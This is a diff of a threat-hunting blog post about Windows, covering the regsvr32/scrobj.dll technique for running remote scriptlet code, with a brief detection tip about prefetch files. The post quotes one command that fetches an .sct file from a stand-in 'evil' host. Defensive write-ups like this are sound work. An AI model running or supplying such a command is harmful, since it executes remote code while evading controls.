Th1ru-M/th1ru-m.github.io/_posts/2024-12-8-WindowsThreatHunting-Part1.md

 `regSvr32 /s /n /u /i:http[:]//evil.php/evil.sct scrobj.dll`

 `regsvr32` is invoking scrobj.dll to unregister COM objects defined in the evil.sct.
 Malicious code will be used in the sct file.
 The SCT file ( an XML file) has a registration tag in it that can contain VBScript or JScript code.
-The file can have any extension.It doesn’t have to be `.sct`.
+The file can have any extension.It does not have to be `.sct`.
 There will be no artifacts left in registry if this utility is unregistering any COM object.

 <u>Detection:</u>
 - Look for regsvr32.exe prefetch files and Parsing the prefetch will provide the executed file.